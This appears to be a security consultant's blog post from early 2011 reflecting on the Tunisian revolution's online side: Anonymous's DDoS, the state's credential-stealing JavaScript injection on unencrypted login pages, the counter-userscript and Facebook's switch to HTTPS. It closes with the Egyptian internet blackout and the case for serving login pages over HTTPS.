Sixteen days after Ben Ali boarded a flight to Jeddah, and three days into the internet blackout in Egypt, I am still trying to work out what the cyber dimension of Tunisia actually was. Most of the press coverage outside the region has treated it as Anonymous taking down government websites with LOIC, which is the small and dull part of the story. The substantive part is the credential-theft attack the Tunisian Internet Agency ran through the first week of January, the userscript Anonymous-aligned developers shipped against it, and the role Nawaat played as the documentation backbone. None of that fits the Estonia 2007 pattern, or the Russia–Georgia template from 2008, or even the Operation Payback model from December. It is a different shape and worth writing down before the journalism congeals it into a single tidy story.
The trigger was Mohamed Bouazizi's self-immolation in Sidi Bouzid on 17 December and his death on 4 January, but the cable archive from WikiLeaks supplied the second wind. The Tunis embassy cables Robert Godec wrote in 2008 and 2009 — describing Ben Ali's regime as sclerotic, and the dinner with Sakher El Materi at his villa with the pet tiger — were circulating heavily on Tunisian Facebook in the last week of December. There is a fair chunk of academic argument coming about whether the cables really mattered or whether they were post-facto kindling, and that argument is partly missing the point. The cables gave Tunisian users on Facebook something concrete and unimpeachable to share. Ben Ali had been telling his own story for twenty-three years; the cables were a counter-text in his own ally's voice, with a date and a signature.
Anonymous announced Operation Tunisia on 2 January with the usual press-release framing and a target list of government sites. The DDoS phase did happen, and several ministry sites were intermittently unreachable for several days. I do not think this was the meaningful part of the operation. The meaningful part was the response to what the ATI was doing.
The ATI had begun, around 4 January, injecting JavaScript into the unencrypted HTTP login pages of Facebook, Gmail and Yahoo as Tunisian users requested them. The injection captured usernames and passwords as the user typed them and posted them to a government-controlled collection point. This is not subtle. It is straight credential phishing run at carrier level, with the man-in-the-middle being the country's only commercial gateway. By the time it was noticed, an unknown number of Tunisian Facebook accounts had been taken over, and a smaller number of bloggers and activists had been arrested using information obtained through them. Slim Amamou, the blogger and Pirate Party member, was one of the people picked up around this time, on 6 January. He was held until Ben Ali fled, and was then, remarkably, appointed Secretary of State for Youth and Sport on 17 January in the transitional government — released from the interrogation cells of the same regime he is now nominally part of, in less than two weeks.
The defensive response within Tunisia is the part I want to remember. An Anonymous-aligned Greasemonkey userscript circulated through #optunisia on IRC and through the Nawaat networks — Sami Ben Gharbia and the Nawaat collective have been the practical hub of all of this — that detected the injected script and stripped it before it could run. Facebook's own response, reconstructed by Alexis Madrigal at the Atlantic last week, was to push every Tunisian login session over HTTPS, which they completed on the evening of 7 January after their security team finally understood the shape of what was happening. So the defensive sequence was userscript first, platform forced-HTTPS second, with the userscript covering the gap between those two. That is the right order morally and operationally, and it is also a working blueprint for any future regime running a similar attack: get the in-country defenders a tool first, push the platform later.
Two things from this are going to occupy me through the spring. The first is that the ATI attack was, technically, easy. It is a JavaScript injection at carrier level against unencrypted login forms. There is nothing special about Tunisia's infrastructure that made this possible. The same operation could be run against any country whose major social and email platforms still serve login pages over HTTP, which at the moment is most of them. The implicit defensive claim of HTTPS Everywhere and the EFF's broader work has been the privacy of the individual user against ad networks and casual snooping. Tunisia is the demonstration that it is also state-defection insurance. Every login form still served over HTTP is an entry point for a regime that decides, in some particular week, that it would rather know who is talking to whom. I do not yet know how to push this argument through to platform product managers beyond saying it loudly, but it is now substantively easier to make.
The second is whether the template moves. As I write this, Egypt is on day three of a near-total internet blackout. Mubarak ordered the cut late on 27 January after Friday of Anger was clearly going to outscale anything in Tunisia. This is a different defensive shape: not a regime trying to surveil, but a regime trying to disconnect. If the protests sustain through this, we are going to learn something we could not learn from Tunisia, which is what coordination capacity remains when the carriers are off. There is already discussion of dial-up-out-of-country, and rumours that Google and Twitter are putting together some kind of phone-to-tweet bridge. I expect the next two weeks to be the most informative period for understanding civilian internet defence under hostile regime conditions that I will see in some time.
For the engagements I am working on, the ATI attack has changed the conversation about TLS deployment. "Login pages over HTTPS" used to be a tick-box item on a pen-test report, the kind of thing that gets deferred for a quarter and then forgotten. It is now operationally pressing in a way I can point to with a real example, against a population I can name. I will write about how that lands with the boards I am sitting in front of, with the usual confidentiality, when there is something substantive to say.
The next post is likely to be Egypt, depending on what survives the next week. If the demonstrations sustain into next weekend, I will be reading Andy Carvin and Jillian York for context more than anything else, and watching whether anything resembling the Greasemonkey userscript emerges in the Egyptian shape of the problem.